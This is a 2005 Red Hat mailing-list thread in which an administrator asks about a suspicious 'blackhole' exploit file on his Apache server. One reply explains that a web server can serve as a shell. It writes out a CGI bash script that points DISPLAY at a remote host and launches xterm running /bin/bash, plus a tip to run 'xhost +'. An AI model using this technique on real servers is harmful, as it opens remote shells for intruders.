> -----Original Message----- > From: redhat-list-bounces@xxxxxxxxxx [mailto:redhat-list- > bounces@xxxxxxxxxx] On Behalf Of Chris Kenward > Sent: Monday, April 11, 2005 8:15 AM > To: 'General Red Hat Linux discussion list' > Subject: RE: Blackhole > > Hi there, Tom > > > Is it possible that you have some shell accounts on your system > > and that one of your users is trying to run this? The C code by > > itself won't harm anything, and from what you say, it does not > > appear to have been compiled. Perhaps just upgrading to the newest > > apache will fix? Looking at the links provided below seem to > > indicate that the executable must be run, to try to break the apache > > server through the listed port. I've seen this attempt many times > > on my machine, & AFAIK, it's never been successful. > > I don't think anyone local to the machine would do something like that - > we > only allow FTP access to the server and no users have telnet or SSH > access. Shell access is not necessary, the web server itself essentially can serve as a shell. Easy enough to write a cgi script to execute all the commands necessary. Hell, even getting a shell is trivial: First we grab an xterm binary from a compatible system, and drop it wherever we have access to, set permissions yada yada yada. Unless of course the admin was kind enough to install it for us, which I have seen plenty of times. We will name the following script xterm.cgi or whatever extensions you have set to execute and drop it into my web sites cgi-bin directory. Of course this will not work if the web server is properly firewalled, which in my experience they hardly ever are. #!/bin/bash export DISPLAY=xxx.xxx.xxx.xxx:0.0 /tmp/xterm -e /bin/bash If you try this don't forget to add the host to your X-Servers acl or simply run xhost+. A web server will let you just about do anything you want ... -Tobias > > The Apache web server is latest version from the RHN (2.0?) > > I've taken the bull by the proverbials and deleted the file called > "blackhole". Can't find anything else suspicious and looking through the > various ports that are active doesn't really show anything suspicious. > > Whew? > > Regards > Chris > > > -- > redhat-list mailing list > unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe > https://www.redhat.com/mailman/listinfo/redhat-list -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
